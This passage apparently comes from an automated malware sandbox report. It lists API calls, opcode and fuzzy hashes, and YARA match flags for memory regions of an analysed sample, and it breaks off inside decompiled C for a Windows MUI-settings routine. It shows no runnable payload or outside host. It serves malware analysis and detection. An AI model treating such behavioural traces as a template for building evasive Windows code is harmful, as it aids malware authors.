Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 020BFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFBC3

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 020BF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BF90E

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 020BF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BF9FB

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 020BFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFEDB

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 020BFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFFBF

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 020BFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFC6B

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 020BFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFD9A

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 020BFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 020BFDCB

Memory Dump Source

Source File: 0000000E.00000002.2369631872.00000000020B0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: true

Associated: 0000000E.00000002.2369625732.00000000020A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369749531.0000000002190000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369754981.00000000021A0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369761038.00000000021A4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369765770.00000000021A7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369770391.00000000021B0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2369810649.0000000002210000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 000E6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 000E6F88

Strings

net.dll, xrefs: 000E6F51, 000E6FD7, 000E6FAF, 000E6FBB, 000E6FE3
wininet.dll, xrefs: 000E6F3E, 000E6F47

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction ID: 5d9909f68ed54c173a995da90325a41eeaeb72e4cfc3ad6a05e0ebde75befe98
Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
Instruction Fuzzy Hash: EC31C4B1602744AFC725DF69E8A1FA7B7F8FB48700F10842DF61A6B242D731A445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000E6ED7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 000E6F88

Strings

net.dll, xrefs: 000E6F51, 000E6FAF, 000E6FBB
wininet.dll, xrefs: 000E6F3E, 000E6F47

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 9ab8c3487d6b55de56572ae576bec8d21e7b02f491d24a269a961bf960411c1f
Instruction ID: 35fb647c1a0f45428346ecf6bf5dcdf4a378f45ef3012c4b30fabd1c2b87c8d6
Opcode Fuzzy Hash: 9ab8c3487d6b55de56572ae576bec8d21e7b02f491d24a269a961bf960411c1f
Instruction Fuzzy Hash: 6F21E1B1601344AFC714DF65E8A1FABB7F4FB48700F10802DF6196B242D771A445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000E84C9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000D3B93), ref: 000E84FD

Strings

.z`, xrefs: 000E84EC, 000E84F8

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 77c983a3e495c44a455abf50a0ebaeb9a74a54e71f915df17b796f4fa7dceb1a
Instruction ID: e01cb153c30e1427b4abcb1e53ed0d407c688dbc90140a35288504ee2fdc7aec
Opcode Fuzzy Hash: 77c983a3e495c44a455abf50a0ebaeb9a74a54e71f915df17b796f4fa7dceb1a
Instruction Fuzzy Hash: F3E09AB5200204AFD714EF94CC88EE773A8EF88350F008589FD585B282CA30EC10CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 000E84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000D3B93), ref: 000E84FD

Strings

.z`, xrefs: 000E84EC, 000E84F8

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: c11f4ec90b95358b67fba2f9d54cfa8c2f5b271abbc47bc94f073bac5cf4d71e
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 67E01AB12002086BD714DF59CC45EA777ACAF88750F018554F90857242CA30E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 000D7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000D72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000D72DB

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction ID: 98a2b802278183f7dcc4eef273297daa1ac83aee0f01dd56c80b734aac1b0635
Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
Instruction Fuzzy Hash: 7E01D631A803687BE720A6959C43FFE776C9F40B50F15011AFF04BA2C2E6947A0687F6

Uniqueness

Uniqueness Score: -1.00%

Function 000D7235, Relevance: 3.0, APIs: 2, Instructions: 49threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000D72BA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000D72DB

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3f65712f562beb7d6df8d50ea8a545956ed6206f633df10fed619bb3e82c9d25
Instruction ID: badf6208d22886dcad3f808dc49af36c94f2b82d3d3ff2adffbb4b7fec794a23
Opcode Fuzzy Hash: 3f65712f562beb7d6df8d50ea8a545956ed6206f633df10fed619bb3e82c9d25
Instruction Fuzzy Hash: BEF04672E802903AE63065A42C43FFA338C4B40B21F04006AFF08EA2C2F681690586F1

Uniqueness

Uniqueness Score: -1.00%

Function 000D9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000D9B92

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: eeca084d1c1fc00846ce9ecc651663b49f222987250f524e8799ab666d86fb1e
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: CA0100B5E0020DABDB10DAA5ED42FDDB7B89B54308F004195A908A7242F631EB14CB51

Uniqueness

Uniqueness Score: -1.00%

Function 000E8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000E8594

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 59a0eb121bafa4cb26a41f71ccacc9199dba9a1bc95994b3c367f6a4c023f805
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 78015FB2214108AFCB54DF89DC81EEB77ADAF8C754F158258FA0DA7251DA30E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000E7003, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000DCCD0,?,?), ref: 000E704C

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 2bc52403362204f6eeefa580f73d39c98050df3ba8f89056dae927ff457b99d3
Instruction ID: 9a55f7794355f380e1b67144fcf93131352aaa64fe70a5531e691ebd8d0f06e5
Opcode Fuzzy Hash: 2bc52403362204f6eeefa580f73d39c98050df3ba8f89056dae927ff457b99d3
Instruction Fuzzy Hash: 71F0EC367502803ED73165798C03FEB77A8CB91B10F14015DF64ABB2C3D591B4074654

Uniqueness

Uniqueness Score: -1.00%

Function 000E7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000DCCD0,?,?), ref: 000E704C

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 5219bfafc38eaaf509297b07bc77ea91853afb01027e5a3efff2efc41b452a83
Instruction ID: 1bd5542203601cfbe39a85bcc6a26307dff797e550987929739abca24bccb0f5
Opcode Fuzzy Hash: 5219bfafc38eaaf509297b07bc77ea91853afb01027e5a3efff2efc41b452a83
Instruction Fuzzy Hash: E8E06D333902443AE23065AA9C02FE7B39CDB81B20F540026FA0DEB2C2D595F80242A4

Uniqueness

Uniqueness Score: -1.00%

Function 000E8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(000E3516,?,000E3C8F,000E3C8F,?,000E3516,?,?,?,?,?,00000000,00000000,?), ref: 000E84BD

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: f7f8625ebea9358fd1c5782e32556d1627120405f5b46576328cda4aa007606e
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 0CE012B1200208ABDB14EF99CC41EA777ACAF88650F118558FA086B282CA30F910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 000E8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,000DCFA2,000DCFA2,?,00000000,?,?), ref: 000E8660

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 91374196fa06abe251c9c27d9475d29f30954cca6184d93853bd400787096e02
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: C2E01AB12002086BDB10DF49CC85EE777ADAF88650F018554FA0C67242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 000DD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,000D7C63,?), ref: 000DD43B

Memory Dump Source

Source File: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 3b7098c52fa918adc0cf8438febd9ee6a7a29fedbceeb284c8554cdd3861d0b9
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: EAD0A7717903043BE610FBA89C07F6632CC5B54B00F494064F949E73C3D960F5004571

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 020E8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E020E8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E020E8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E020CE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E020E718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E020E8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E020E718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E020E8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E020E8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E020E8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E020E718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E020CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E020C2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E020DE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E020CE2A8(_t322,  &_v68, _v16);
								if(E020E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E020DE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E020CE2A8(_t322,  &_v68, _t236);
								if(E020E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E020CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
